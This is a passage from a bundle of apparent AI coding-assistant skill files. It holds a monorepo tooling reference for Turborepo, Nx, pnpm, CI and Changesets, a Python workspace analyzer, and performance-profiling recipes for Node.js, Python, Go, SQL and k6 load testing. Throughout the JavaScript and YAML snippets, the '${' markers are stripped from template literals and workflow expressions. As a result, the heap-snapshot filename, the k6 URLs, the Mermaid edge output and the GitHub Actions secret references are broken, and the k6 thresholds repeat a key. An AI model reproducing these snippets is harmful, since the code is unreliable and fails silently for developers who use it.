- Prefer one-way dependencies from apps/services to packages/libs.
- Keep cross-app imports disallowed unless explicitly approved.
- Keep `types` packages runtime-free to avoid unexpected coupling.
## Build/CI Patterns
- Use affected-only CI (`--filter` or equivalent).
- Enable remote cache for build and test tasks.
- Split lint/typecheck/test tasks to isolate failures quickly.
## Release Patterns
- Use Changesets or equivalent for versioning.
- Keep package publishing automated and reproducible.
- Use prerelease channels for unstable shared package changes.
FILE:references/monorepo-tooling-reference.md
# monorepo-navigator reference
## Turborepo
### turbo.json pipeline config
```json
{
"$schema": "https://turbo.build/schema.json",
"globalEnv": ["NODE_ENV", "DATABASE_URL"],
"pipeline": {
"build": {
"dependsOn": ["^build"], // build deps first (topological order)
"outputs": [".next/**", "dist/**", "build/**"],
"env": ["NEXT_PUBLIC_API_URL"]
},
"test": {
"dependsOn": ["^build"], // need built deps to test
"outputs": ["coverage/**"],
"cache": true
},
"lint": {
"outputs": [],
"cache": true
},
"dev": {
"cache": false, // never cache dev servers
"persistent": true // long-running process
},
"type-check": {
"dependsOn": ["^build"],
"outputs": []
}
}
}
```
### Key commands
```bash
# Build everything (respects dependency order)
turbo run build
# Build only affected packages (requires --filter)
turbo run build --filter=...[HEAD^1] # changed since last commit
turbo run build --filter=...[main] # changed vs main branch
# Test only affected
turbo run test --filter=...[HEAD^1]
# Run for a specific app and all its dependencies
turbo run build --filter=@myorg/web...
# Run for a specific package only (no dependencies)
turbo run build --filter=@myorg/ui
# Dry-run — see what would run without executing
turbo run build --dry-run
# Enable remote caching (Vercel Remote Cache)
turbo login
turbo link
```
### Remote caching setup
```bash
# .turbo/config.json (auto-created by turbo link)
{
"teamid": "team_xxxx",
"apiurl": "https://vercel.com"
}
# Self-hosted cache server (open-source alternative)
# Run ducktape/turborepo-remote-cache or Turborepo's official server
TURBO_API=http://your-cache-server.internal \
TURBO_TOKEN=your-token \
TURBO_TEAM=your-team \
turbo run build
```
---
## Nx
### Project graph and affected commands
```bash
# Install
npx create-nx-workspace@latest my-monorepo
# Visualize the project graph (opens browser)
nx graph
# Show affected packages for the current branch
nx affected:graph
# Run only affected tests
nx affected --target=test
# Run only affected builds
nx affected --target=build
# Run affected with base/head (for CI)
nx affected --target=test --base=main --head=HEAD
```
### nx.json configuration
```json
{
"$schema": "./node_modules/nx/schemas/nx-schema.json",
"targetDefaults": {
"build": {
"dependsOn": ["^build"],
"cache": true
},
"test": {
"cache": true,
"inputs": ["default", "^production"]
}
},
"namedInputs": {
"default": ["{projectRoot}/**/*", "sharedGlobals"],
"production": ["default", "!{projectRoot}/**/*.spec.ts", "!{projectRoot}/jest.config.*"],
"sharedGlobals": []
},
"parallel": 4,
"cacheDirectory": "/tmp/nx-cache"
}
```
---
## pnpm Workspaces
### pnpm-workspace.yaml
```yaml
packages:
- 'apps/*'
- 'packages/*'
- 'tools/*'
```
### workspace:* protocol for local packages
```json
// apps/web/package.json
{
"name": "@myorg/web",
"dependencies": {
"@myorg/ui": "workspace:*", // always use local version
"@myorg/utils": "workspace:^", // local, but respect semver on publish
"@myorg/types": "workspace:~"
}
}
```
### Useful pnpm workspace commands
```bash
# Install all packages across workspace
pnpm install
# Run script in a specific package
pnpm --filter @myorg/web dev
# Run script in all packages
pnpm --filter "*" build
# Run script in a package and all its dependencies
pnpm --filter @myorg/web... build
# Add a dependency to a specific package
pnpm --filter @myorg/web add react
# Add a shared dev dependency to root
pnpm add -D typescript -w
# List workspace packages
pnpm ls --depth -1 -r
```
---
## Cross-Package Impact Analysis
When a shared package changes, determine what's affected before you ship.
```bash
# Using Turborepo — show affected packages
turbo run build --filter=...[HEAD^1] --dry-run 2>&1 | grep "Tasks to run"
# Using Nx
nx affected:apps --base=main --head=HEAD # which apps are affected
nx affected:libs --base=main --head=HEAD # which libs are affected
# Manual analysis with pnpm
# Find all packages that depend on @myorg/utils:
grep -r '"@myorg/utils"' packages/*/package.json apps/*/package.json
# Using jq for structured output
for pkg in packages/*/package.json apps/*/package.json; do
name=$(jq -r '.name' "$pkg")
if jq -e '.dependencies["@myorg/utils"] // .devDependencies["@myorg/utils"]' "$pkg" > /dev/null 2>&1; then
echo "$name depends on @myorg/utils"
fi
done
```
---
## Dependency Graph Visualization
Generate a Mermaid diagram from your workspace:
```bash
# Generate dependency graph as Mermaid
cat > scripts/gen-dep-graph.js << 'EOF'
const { execSync } = require('child_process');
const fs = require('fs');
// Parse pnpm workspace packages
const packages = JSON.parse(
execSync('pnpm ls --depth -1 -r --json').toString()
);
let mermaid = 'graph TD\n';
packages.forEach(pkg => {
const deps = Object.keys(pkg.dependencies || {})
.filter(d => d.startsWith('@myorg/'));
deps.forEach(dep => {
const from = pkg.name.replace('@myorg/', '');
const to = dep.replace('@myorg/', '');
mermaid += ` from --> to\n`;
});
});
fs.writeFileSync('docs/dep-graph.md', '```mermaid\n' + mermaid + '```\n');
console.log('Written to docs/dep-graph.md');
EOF
node scripts/gen-dep-graph.js
```
**Example output:**
```mermaid
graph TD
web --> ui
web --> utils
web --> types
mobile --> ui
mobile --> utils
mobile --> types
admin --> ui
admin --> utils
api --> types
ui --> utils
```
---
## Claude Code Configuration (Workspace-Aware CLAUDE.md)
Place a root CLAUDE.md + per-package CLAUDE.md files:
```markdown
# /CLAUDE.md — Root (applies to all packages)
## Monorepo Structure
- apps/web — Next.js customer-facing app
- apps/admin — Next.js internal admin
- apps/api — Express REST API
- packages/ui — Shared React component library
- packages/utils — Shared utilities (pure functions only)
- packages/types — Shared TypeScript types (no runtime code)
## Build System
- pnpm workspaces + Turborepo
- Always use `pnpm --filter <package>` to scope commands
- Never run `npm install` or `yarn` — pnpm only
- Run `turbo run build --filter=...[HEAD^1]` before committing
## Task Scoping Rules
- When modifying packages/ui: also run tests for apps/web and apps/admin (they depend on it)
- When modifying packages/types: run type-check across ALL packages
- When modifying apps/api: only need to test apps/api
## Package Manager
pnpm — version pinned in packageManager field of root package.json
```
```markdown
# /packages/ui/CLAUDE.md — Package-specific
## This Package
Shared React component library. Zero business logic. Pure UI only.
## Rules
- All components must be exported from src/index.ts
- No direct API calls in components — accept data via props
- Every component needs a Storybook story in src/stories/
- Use Tailwind for styling — no CSS modules or styled-components
## Testing
- Component tests: `pnpm --filter @myorg/ui test`
- Visual regression: `pnpm --filter @myorg/ui test:storybook`
## Publishing
- Version bumps via changesets only — never edit package.json version manually
- Run `pnpm changeset` from repo root after changes
```
---
## Migration: Multi-Repo → Monorepo
```bash
# Step 1: Create monorepo scaffold
mkdir my-monorepo && cd my-monorepo
pnpm init
echo "packages:\n - 'apps/*'\n - 'packages/*'" > pnpm-workspace.yaml
# Step 2: Move repos with git history preserved
mkdir -p apps packages
# For each existing repo:
git clone https://github.com/myorg/web-app
cd web-app
git filter-repo --to-subdirectory-filter apps/web # rewrites history into subdir
cd ..
git remote add web-app ./web-app
git fetch web-app --tags
git merge web-app/main --allow-unrelated-histories
# Step 3: Update package names to scoped
# In each package.json, change "name": "web" to "name": "@myorg/web"
# Step 4: Replace cross-repo npm deps with workspace:*
# apps/web/package.json: "@myorg/ui": "1.2.3" → "@myorg/ui": "workspace:*"
# Step 5: Add shared configs to root
cp apps/web/.eslintrc.js .eslintrc.base.js
# Update each package's config to extend root:
# { "extends": ["../../.eslintrc.base.js"] }
# Step 6: Add Turborepo
pnpm add -D turbo -w
# Create turbo.json (see above)
# Step 7: Unified CI (see CI section below)
# Step 8: Test everything
turbo run build test lint
```
---
## CI Patterns
### GitHub Actions — Affected Only
```yaml
# .github/workflows/ci.yml
name: "ci"
on:
push:
branches: [main]
pull_request:
jobs:
affected:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0 # full history needed for affected detection
- uses: pnpm/action-setup@v3
with:
version: 9
- uses: actions/setup-node@v4
with:
node-version: 20
cache: pnpm
- run: pnpm install --frozen-lockfile
# Turborepo remote cache
- uses: actions/cache@v4
with:
path: .turbo
key: { runner.os}-turbo-{ github.sha}
restore-keys: { runner.os}-turbo-
# Only test/build affected packages
- name: "build-affected"
run: turbo run build --filter=...[origin/main]
env:
TURBO_TOKEN: { secrets.TURBO_TOKEN}
TURBO_TEAM: { vars.TURBO_TEAM}
- name: "test-affected"
run: turbo run test --filter=...[origin/main]
- name: "lint-affected"
run: turbo run lint --filter=...[origin/main]
```
### GitLab CI — Parallel Stages
```yaml
# .gitlab-ci.yml
stages: [install, build, test, publish]
variables:
PNPM_CACHE_FOLDER: .pnpm-store
cache:
key: pnpm-$CI_COMMIT_REF_SLUG
paths: [.pnpm-store/, .turbo/]
install:
stage: install
script:
- pnpm install --frozen-lockfile
artifacts:
paths: [node_modules/, packages/*/node_modules/, apps/*/node_modules/]
expire_in: 1h
build:affected:
stage: build
needs: [install]
script:
- turbo run build --filter=...[origin/main]
artifacts:
paths: [apps/*/dist/, apps/*/.next/, packages/*/dist/]
test:affected:
stage: test
needs: [build:affected]
script:
- turbo run test --filter=...[origin/main]
coverage: '/Statements\s*:\s*(\d+\.?\d*)%/'
artifacts:
reports:
coverage_report:
coverage_format: cobertura
path: "**/coverage/cobertura-coverage.xml"
```
---
## Publishing with Changesets
```bash
# Install changesets
pnpm add -D @changesets/cli -w
pnpm changeset init
# After making changes, create a changeset
pnpm changeset
# Interactive: select packages, choose semver bump, write changelog entry
# In CI — version packages + update changelogs
pnpm changeset version
# Publish all changed packages
pnpm changeset publish
# Pre-release channel (for alpha/beta)
pnpm changeset pre enter beta
pnpm changeset
pnpm changeset version # produces 1.2.0-beta.0
pnpm changeset publish --tag beta
pnpm changeset pre exit # back to stable releases
```
### Automated publish workflow (GitHub Actions)
```yaml
# .github/workflows/release.yml
name: "release"
on:
push:
branches: [main]
jobs:
release:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: pnpm/action-setup@v3
- uses: actions/setup-node@v4
with:
node-version: 20
registry-url: https://registry.npmjs.org
- run: pnpm install --frozen-lockfile
- name: "create-release-pr-or-publish"
uses: changesets/action@v1
with:
publish: pnpm changeset publish
version: pnpm changeset version
commit: "chore: release packages"
title: "chore: release packages"
env:
GITHUB_TOKEN: { secrets.GITHUB_TOKEN}
NODE_AUTH_TOKEN: { secrets.NPM_TOKEN}
```
---
FILE:scripts/monorepo_analyzer.py
#!/usr/bin/env python3
"""Detect monorepo tooling, workspaces, and internal dependency graph."""
from __future__ import annotations
import argparse
import glob
import json
import os
from pathlib import Path
from typing import Dict, List, Set
def load_json(path: Path) -> Dict:
try:
return json.loads(path.read_text(encoding="utf-8"))
except Exception:
return {}
def detect_repo_type(root: Path) -> List[str]:
detected: List[str] = []
if (root / "turbo.json").exists():
detected.append("Turborepo")
if (root / "nx.json").exists():
detected.append("Nx")
if (root / "pnpm-workspace.yaml").exists():
detected.append("pnpm-workspaces")
if (root / "lerna.json").exists():
detected.append("Lerna")
pkg = load_json(root / "package.json")
if "workspaces" in pkg and "npm-workspaces" not in detected:
detected.append("npm-workspaces")
return detected
def parse_pnpm_workspace(root: Path) -> List[str]:
workspace_file = root / "pnpm-workspace.yaml"
if not workspace_file.exists():
return []
patterns: List[str] = []
in_packages = False
for line in workspace_file.read_text(encoding="utf-8", errors="ignore").splitlines():
stripped = line.strip()
if stripped.startswith("packages:"):
in_packages = True
continue
if in_packages and stripped.startswith("-"):
item = stripped[1:].strip().strip('"').strip("'")
if item:
patterns.append(item)
elif in_packages and stripped and not stripped.startswith("#") and not stripped.startswith("-"):
in_packages = False
return patterns
def parse_package_workspaces(root: Path) -> List[str]:
pkg = load_json(root / "package.json")
workspaces = pkg.get("workspaces")
if isinstance(workspaces, list):
return [str(item) for item in workspaces]
if isinstance(workspaces, dict) and isinstance(workspaces.get("packages"), list):
return [str(item) for item in workspaces["packages"]]
return []
def expand_workspace_patterns(root: Path, patterns: List[str]) -> List[Path]:
paths: Set[Path] = set()
for pattern in patterns:
for match in glob.glob(str(root / pattern)):
p = Path(match)
if p.is_dir() and (p / "package.json").exists():
paths.add(p.resolve())
return sorted(paths)
def load_workspace_packages(workspaces: List[Path]) -> Dict[str, Dict]:
packages: Dict[str, Dict] = {}
for ws in workspaces:
data = load_json(ws / "package.json")
name = data.get("name") or ws.name
packages[name] = {
"path": str(ws),
"dependencies": data.get("dependencies", {}),
"devDependencies": data.get("devDependencies", {}),
"peerDependencies": data.get("peerDependencies", {}),
}
return packages
def build_dependency_graph(packages: Dict[str, Dict]) -> Dict[str, List[str]]:
package_names = set(packages.keys())
graph: Dict[str, List[str]] = {}
for name, meta in packages.items():
deps: Set[str] = set()
for section in ("dependencies", "devDependencies", "peerDependencies"):
dep_map = meta.get(section, {})
if isinstance(dep_map, dict):
for dep_name in dep_map.keys():
if dep_name in package_names:
deps.add(dep_name)
graph[name] = sorted(deps)
return graph
def format_tree_paths(root: Path, workspaces: List[Path]) -> List[str]:
out: List[str] = []
for ws in workspaces:
out.append(str(ws.relative_to(root)))
return out
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser(description="Analyze monorepo type, workspaces, and internal dependency graph.")
parser.add_argument("path", help="Monorepo root path")
parser.add_argument("--json", action="store_true", help="Output JSON")
return parser.parse_args()
def main() -> int:
args = parse_args()
root = Path(args.path).expanduser().resolve()
if not root.exists() or not root.is_dir():
raise SystemExit(f"Path is not a directory: {root}")
types = detect_repo_type(root)
patterns = parse_pnpm_workspace(root)
if not patterns:
patterns = parse_package_workspaces(root)
workspaces = expand_workspace_patterns(root, patterns)
packages = load_workspace_packages(workspaces)
graph = build_dependency_graph(packages)
report = {
"root": str(root),
"detected_types": types,
"workspace_patterns": patterns,
"workspace_paths": format_tree_paths(root, workspaces),
"package_count": len(packages),
"dependency_graph": graph,
}
if args.json:
print(json.dumps(report, indent=2))
else:
print("Monorepo Analysis")
print(f"Root: {report['root']}")
print(f"Detected: {', '.join(types) if types else 'none'}")
print(f"Workspace patterns: {', '.join(patterns) if patterns else 'none'}")
print("")
print("Workspaces")
for ws in report["workspace_paths"]:
print(f"- {ws}")
if not report["workspace_paths"]:
print("- none detected")
print("")
print("Internal dependency graph")
for pkg, deps in graph.items():
print(f"- {pkg} -> {', '.join(deps) if deps else '(no internal deps)'}")
return 0
if __name__ == "__main__":
raise SystemExit(main())
Phân tích hiệu năng hệ thống cho Node.js, Python, Go: tìm nút thắt CPU, bộ nhớ, I/O, flamegraph, bundle, truy vấn CSDL và load test bằng k6, Artillery.
---
name: "performance-profiler"
description: "Systematic performance profiling for Node.js, Python, and Go applications. Identifies CPU, memory, and I/O bottlenecks, generates flamegraphs, analyzes bundle sizes, optimizes database queries, runs load tests with k6 and Artillery. Always measures before and after. Use when investigating a slow endpoint, planning a performance budget, or hunting a memory leak in production."
---
# Performance Profiler
**Tier:** POWERFUL
**Category:** Engineering
**Domain:** Performance Engineering
---
## Overview
Systematic performance profiling for Node.js, Python, and Go applications. Identifies CPU, memory, and I/O bottlenecks; generates flamegraphs; analyzes bundle sizes; optimizes database queries; detects memory leaks; and runs load tests with k6 and Artillery. Always measures before and after.
## Core Capabilities
- **CPU profiling** — flamegraphs for Node.js, py-spy for Python, pprof for Go
- **Memory profiling** — heap snapshots, leak detection, GC pressure
- **Bundle analysis** — webpack-bundle-analyzer, Next.js bundle analyzer
- **Database optimization** — EXPLAIN ANALYZE, slow query log, N+1 detection
- **Load testing** — k6 scripts, Artillery scenarios, ramp-up patterns
- **Before/after measurement** — establish baseline, profile, optimize, verify
---
## When to Use
- App is slow and you don't know where the bottleneck is
- P99 latency exceeds SLA before a release
- Memory usage grows over time (suspected leak)
- Bundle size increased after adding dependencies
- Preparing for a traffic spike (load test before launch)
- Database queries taking >100ms
---
## Quick Start
```bash
# Analyze a project for performance risk indicators
python3 scripts/performance_profiler.py /path/to/project
# JSON output for CI integration
python3 scripts/performance_profiler.py /path/to/project --json
# Custom large-file threshold
python3 scripts/performance_profiler.py /path/to/project --large-file-threshold-kb 256
```
---
## Golden Rule: Measure First
```bash
# Establish baseline BEFORE any optimization
# Record: P50, P95, P99 latency | RPS | error rate | memory usage
# Wrong: "I think the N+1 query is slow, let me fix it"
# Right: Profile → confirm bottleneck → fix → measure again → verify improvement
```
---
## Node.js Profiling
→ See references/profiling-recipes.md for details
## Before/After Measurement Template
```markdown
## Performance Optimization: [What You Fixed]
**Date:** 2026-03-01
**Engineer:** @username
**Ticket:** PROJ-123
### Problem
[1-2 sentences: what was slow, how was it observed]
### Root Cause
[What the profiler revealed]
### Baseline (Before)
| Metric | Value |
|--------|-------|
| P50 latency | 480ms |
| P95 latency | 1,240ms |
| P99 latency | 3,100ms |
| RPS @ 50 VUs | 42 |
| Error rate | 0.8% |
| DB queries/req | 23 (N+1) |
Profiler evidence: [link to flamegraph or screenshot]
### Fix Applied
[What changed — code diff or description]
### After
| Metric | Before | After | Delta |
|--------|--------|-------|-------|
| P50 latency | 480ms | 48ms | -90% |
| P95 latency | 1,240ms | 120ms | -90% |
| P99 latency | 3,100ms | 280ms | -91% |
| RPS @ 50 VUs | 42 | 380 | +804% |
| Error rate | 0.8% | 0% | -100% |
| DB queries/req | 23 | 1 | -96% |
### Verification
Load test run: [link to k6 output]
```
---
## Optimization Checklist
### Quick wins (check these first)
```
Database
□ Missing indexes on WHERE/ORDER BY columns
□ N+1 queries (check query count per request)
□ Loading all columns when only 2-3 needed (SELECT *)
□ No LIMIT on unbounded queries
□ Missing connection pool (creating new connection per request)
Node.js
□ Sync I/O (fs.readFileSync) in hot path
□ JSON.parse/stringify of large objects in hot loop
□ Missing caching for expensive computations
□ No compression (gzip/brotli) on responses
□ Dependencies loaded in request handler (move to module level)
Bundle
□ Moment.js → dayjs/date-fns
□ Lodash (full) → lodash/function imports
□ Static imports of heavy components → dynamic imports
□ Images not optimized / not using next/image
□ No code splitting on routes
API
□ No pagination on list endpoints
□ No response caching (Cache-Control headers)
□ Serial awaits that could be parallel (Promise.all)
□ Fetching related data in a loop instead of JOIN
```
---
## Common Pitfalls
- **Optimizing without measuring** — you'll optimize the wrong thing
- **Testing in development** — profile against production-like data volumes
- **Ignoring P99** — P50 can look fine while P99 is catastrophic
- **Premature optimization** — fix correctness first, then performance
- **Not re-measuring** — always verify the fix actually improved things
- **Load testing production** — use staging with production-size data
---
## Best Practices
1. **Baseline first, always** — record metrics before touching anything
2. **One change at a time** — isolate the variable to confirm causation
3. **Profile with realistic data** — 10 rows in dev, millions in prod — different bottlenecks
4. **Set performance budgets** — `p(95) < 200ms` in CI thresholds with k6
5. **Monitor continuously** — add Datadog/Prometheus metrics for key paths
6. **Cache invalidation strategy** — cache aggressively, invalidate precisely
7. **Document the win** — before/after in the PR description motivates the team
FILE:references/profiling-recipes.md
# performance-profiler reference
## Node.js Profiling
### CPU Flamegraph
```bash
# Method 1: clinic.js (best for development)
npm install -g clinic
# CPU flamegraph
clinic flame -- node dist/server.js
# Heap profiler
clinic heapprofiler -- node dist/server.js
# Bubble chart (event loop blocking)
clinic bubbles -- node dist/server.js
# Load with autocannon while profiling
autocannon -c 50 -d 30 http://localhost:3000/api/tasks &
clinic flame -- node dist/server.js
```
```bash
# Method 2: Node.js built-in profiler
node --prof dist/server.js
# After running some load:
node --prof-process isolate-*.log | head -100
```
```bash
# Method 3: V8 CPU profiler via inspector
node --inspect dist/server.js
# Open Chrome DevTools → Performance → Record
```
### Heap Snapshot / Memory Leak Detection
```javascript
// Add to your server for on-demand heap snapshots
import v8 from 'v8'
import fs from 'fs'
// Endpoint: POST /debug/heap-snapshot (protect with auth!)
app.post('/debug/heap-snapshot', (req, res) => {
const filename = `heap-Date.now().heapsnapshot`
const snapshot = v8.writeHeapSnapshot(filename)
res.json({ snapshot })
})
```
```bash
# Take snapshots over time and compare in Chrome DevTools
curl -X POST http://localhost:3000/debug/heap-snapshot
# Wait 5 minutes of load
curl -X POST http://localhost:3000/debug/heap-snapshot
# Open both snapshots in Chrome → Memory → Compare
```
### Detect Event Loop Blocking
```javascript
// Add blocked-at to detect synchronous blocking
import blocked from 'blocked-at'
blocked((time, stack) => {
console.warn(`Event loop blocked for timems`)
console.warn(stack.join('\n'))
}, { threshold: 100 }) // Alert if blocked > 100ms
```
### Node.js Memory Profiling Script
```javascript
// scripts/memory-profile.mjs
// Run: node --experimental-vm-modules scripts/memory-profile.mjs
import { createRequire } from 'module'
const require = createRequire(import.meta.url)
function formatBytes(bytes) {
return (bytes / 1024 / 1024).toFixed(2) + ' MB'
}
function measureMemory(label) {
const mem = process.memoryUsage()
console.log(`\n[label]`)
console.log(` RSS: formatBytes(mem.rss)`)
console.log(` Heap Used: formatBytes(mem.heapUsed)`)
console.log(` Heap Total:formatBytes(mem.heapTotal)`)
console.log(` External: formatBytes(mem.external)`)
return mem
}
const baseline = measureMemory('Baseline')
// Simulate your operation
for (let i = 0; i < 1000; i++) {
// Replace with your actual operation
const result = await someOperation()
}
const after = measureMemory('After 1000 operations')
console.log(`\n[Delta]`)
console.log(` Heap Used: +formatBytes(after.heapUsed - baseline.heapUsed)`)
// If heap keeps growing across GC cycles, you have a leak
global.gc?.() // Run with --expose-gc flag
const afterGC = measureMemory('After GC')
if (afterGC.heapUsed > baseline.heapUsed * 1.1) {
console.warn('⚠️ Possible memory leak detected (>10% growth after GC)')
}
```
---
## Python Profiling
### CPU Profiling with py-spy
```bash
# Install
pip install py-spy
# Profile a running process (no code changes needed)
py-spy top --pid $(pgrep -f "uvicorn")
# Generate flamegraph SVG
py-spy record -o flamegraph.svg --pid $(pgrep -f "uvicorn") --duration 30
# Profile from the start
py-spy record -o flamegraph.svg -- python -m uvicorn app.main:app
# Open flamegraph.svg in browser — look for wide bars = hot code paths
```
### cProfile for function-level profiling
```python
# scripts/profile_endpoint.py
import cProfile
import pstats
import io
from app.services.task_service import TaskService
def run():
service = TaskService()
for _ in range(100):
service.list_tasks(user_id="user_1", page=1, limit=20)
profiler = cProfile.Profile()
profiler.enable()
run()
profiler.disable()
# Print top 20 functions by cumulative time
stream = io.StringIO()
stats = pstats.Stats(profiler, stream=stream)
stats.sort_stats('cumulative')
stats.print_stats(20)
print(stream.getvalue())
```
### Memory profiling with memory_profiler
```python
# pip install memory-profiler
from memory_profiler import profile
@profile
def my_function():
# Function to profile
data = load_large_dataset()
result = process(data)
return result
```
```bash
# Run with line-by-line memory tracking
python -m memory_profiler scripts/profile_function.py
# Output:
# Line # Mem usage Increment Line Contents
# ================================================
# 10 45.3 MiB 45.3 MiB def my_function():
# 11 78.1 MiB 32.8 MiB data = load_large_dataset()
# 12 156.2 MiB 78.1 MiB result = process(data)
```
---
## Go Profiling with pprof
```go
// main.go — add pprof endpoints
import _ "net/http/pprof"
import "net/http"
func main() {
// pprof endpoints at /debug/pprof/
go func() {
log.Println(http.ListenAndServe(":6060", nil))
}()
// ... rest of your app
}
```
```bash
# CPU profile (30s)
go tool pprof -http=:8080 http://localhost:6060/debug/pprof/profile?seconds=30
# Memory profile
go tool pprof -http=:8080 http://localhost:6060/debug/pprof/heap
# Goroutine leak detection
curl http://localhost:6060/debug/pprof/goroutine?debug=1
# In pprof UI: "Flame Graph" view → find the tallest bars
```
---
## Bundle Size Analysis
### Next.js Bundle Analyzer
```bash
# Install
pnpm add -D @next/bundle-analyzer
# next.config.js
const withBundleAnalyzer = require('@next/bundle-analyzer')({
enabled: process.env.ANALYZE === 'true',
})
module.exports = withBundleAnalyzer({})
# Run analyzer
ANALYZE=true pnpm build
# Opens browser with treemap of bundle
```
### What to look for
```bash
# Find the largest chunks
pnpm build 2>&1 | grep -E "^\s+(λ|○|●)" | sort -k4 -rh | head -20
# Check if a specific package is too large
# Visit: https://bundlephobia.com/package/moment@2.29.4
# moment: 67.9kB gzipped → replace with date-fns (13.8kB) or dayjs (6.9kB)
# Find duplicate packages
pnpm dedupe --check
# Visualize what's in a chunk
npx source-map-explorer .next/static/chunks/*.js
```
### Common bundle wins
```typescript
// Before: import entire lodash
import _ from 'lodash' // 71kB
// After: import only what you need
import debounce from 'lodash/debounce' // 2kB
// Before: moment.js
import moment from 'moment' // 67kB
// After: dayjs
import dayjs from 'dayjs' // 7kB
// Before: static import (always in bundle)
import HeavyChart from '@/components/HeavyChart'
// After: dynamic import (loaded on demand)
const HeavyChart = dynamic(() => import('@/components/HeavyChart'), {
loading: () => <Skeleton />,
})
```
---
## Database Query Optimization
### Find slow queries
```sql
-- PostgreSQL: enable pg_stat_statements
CREATE EXTENSION IF NOT EXISTS pg_stat_statements;
-- Top 20 slowest queries
SELECT
round(mean_exec_time::numeric, 2) AS mean_ms,
calls,
round(total_exec_time::numeric, 2) AS total_ms,
round(stddev_exec_time::numeric, 2) AS stddev_ms,
left(query, 80) AS query
FROM pg_stat_statements
WHERE calls > 10
ORDER BY mean_exec_time DESC
LIMIT 20;
-- Reset stats
SELECT pg_stat_statements_reset();
```
```bash
# MySQL slow query log
mysql -e "SET GLOBAL slow_query_log = 'ON'; SET GLOBAL long_query_time = 0.1;"
tail -f /var/log/mysql/slow-query.log
```
### EXPLAIN ANALYZE
```sql
-- Always use EXPLAIN (ANALYZE, BUFFERS) for real timing
EXPLAIN (ANALYZE, BUFFERS, FORMAT TEXT)
SELECT t.*, u.name as assignee_name
FROM tasks t
LEFT JOIN users u ON u.id = t.assignee_id
WHERE t.project_id = 'proj_123'
AND t.deleted_at IS NULL
ORDER BY t.created_at DESC
LIMIT 20;
-- Look for:
-- Seq Scan on large table → needs index
-- Nested Loop with high rows → N+1, consider JOIN or batch
-- Sort → can index handle the sort?
-- Hash Join → fine for moderate sizes
```
### Detect N+1 Queries
```typescript
// Add query logging in dev
import { db } from './client'
// Drizzle: enable logging
const db = drizzle(pool, { logger: true })
// Or use a query counter middleware
let queryCount = 0
db.$on('query', () => queryCount++)
// In tests:
queryCount = 0
const tasks = await getTasksWithAssignees(projectId)
expect(queryCount).toBe(1) // Fail if it's 21 (1 + 20 N+1s)
```
```python
# Django: detect N+1 with django-silk or nplusone
from nplusone.ext.django.middleware import NPlusOneMiddleware
MIDDLEWARE = ['nplusone.ext.django.middleware.NPlusOneMiddleware']
NPLUSONE_RAISE = True # Raise exception on N+1 in tests
```
### Fix N+1 — Before/After
```typescript
// Before: N+1 (1 query for tasks + N queries for assignees)
const tasks = await db.select().from(tasksTable)
for (const task of tasks) {
task.assignee = await db.select().from(usersTable)
.where(eq(usersTable.id, task.assigneeId))
.then(r => r[0])
}
// After: 1 query with JOIN
const tasks = await db
.select({
id: tasksTable.id,
title: tasksTable.title,
assigneeName: usersTable.name,
assigneeEmail: usersTable.email,
})
.from(tasksTable)
.leftJoin(usersTable, eq(usersTable.id, tasksTable.assigneeId))
.where(eq(tasksTable.projectId, projectId))
```
---
## Load Testing with k6
```javascript
// tests/load/api-load-test.js
import http from 'k6/http'
import { check, sleep } from 'k6'
import { Rate, Trend } from 'k6/metrics'
const errorRate = new Rate('errors')
const taskListDuration = new Trend('task_list_duration')
export const options = {
stages: [
{ duration: '30s', target: 10 }, // Ramp up to 10 VUs
{ duration: '1m', target: 50 }, // Ramp to 50 VUs
{ duration: '2m', target: 50 }, // Sustain 50 VUs
{ duration: '30s', target: 100 }, // Spike to 100 VUs
{ duration: '1m', target: 50 }, // Back to 50
{ duration: '30s', target: 0 }, // Ramp down
],
thresholds: {
http_req_duration: ['p(95)<500'], // 95% of requests < 500ms
http_req_duration: ['p(99)<1000'], // 99% < 1s
errors: ['rate<0.01'], // Error rate < 1%
task_list_duration: ['p(95)<200'], // Task list specifically < 200ms
},
}
const BASE_URL = __ENV.BASE_URL || 'http://localhost:3000'
export function setup() {
// Get auth token once
const loginRes = http.post(`BASE_URL/api/auth/login`, JSON.stringify({
email: 'loadtest@example.com',
password: 'loadtest123',
}), { headers: { 'Content-Type': 'application/json' } })
return { token: loginRes.json('token') }
}
export default function(data) {
const headers = {
'Authorization': `Bearer data.token`,
'Content-Type': 'application/json',
}
// Scenario 1: List tasks
const start = Date.now()
const listRes = http.get(`BASE_URL/api/tasks?limit=20`, { headers })
taskListDuration.add(Date.now() - start)
check(listRes, {
'list tasks: status 200': (r) => r.status === 200,
'list tasks: has items': (r) => r.json('items') !== undefined,
}) || errorRate.add(1)
sleep(0.5)
// Scenario 2: Create task
const createRes = http.post(
`BASE_URL/api/tasks`,
JSON.stringify({ title: `Load test task Date.now()`, priority: 'medium' }),
{ headers }
)
check(createRes, {
'create task: status 201': (r) => r.status === 201,
}) || errorRate.add(1)
sleep(1)
}
export function teardown(data) {
// Cleanup: delete load test tasks
}
```
```bash
# Run load test
k6 run tests/load/api-load-test.js \
--env BASE_URL=https://staging.myapp.com
# With Grafana output
k6 run --out influxdb=http://localhost:8086/k6 tests/load/api-load-test.js
```
---
FILE:scripts/performance_profiler.py
#!/usr/bin/env python3
"""Lightweight repo performance profiling helper (stdlib only)."""
from __future__ import annotations
import argparse
import json
import os
from pathlib import Path
from typing import Dict, Iterable, List, Tuple
EXT_WEIGHTS = {
".js": 1.0,
".jsx": 1.0,
".ts": 1.0,
".tsx": 1.0,
".css": 0.7,
".map": 2.0,
}
def iter_files(root: Path) -> Iterable[Path]:
for dirpath, dirnames, filenames in os.walk(root):
dirnames[:] = [d for d in dirnames if d not in {".git", "node_modules", ".next", "dist", "build", "coverage", "__pycache__"}]
for filename in filenames:
path = Path(dirpath) / filename
if path.is_file():
yield path
def get_large_files(root: Path, threshold_bytes: int) -> List[Tuple[str, int]]:
large: List[Tuple[str, int]] = []
for file_path in iter_files(root):
size = file_path.stat().st_size
if size >= threshold_bytes:
large.append((str(file_path.relative_to(root)), size))
return sorted(large, key=lambda item: item[1], reverse=True)
def count_dependencies(root: Path) -> Dict[str, int]:
counts = {"node_dependencies": 0, "python_dependencies": 0, "go_dependencies": 0}
package_json = root / "package.json"
if package_json.exists():
try:
data = json.loads(package_json.read_text(encoding="utf-8"))
deps = data.get("dependencies", {})
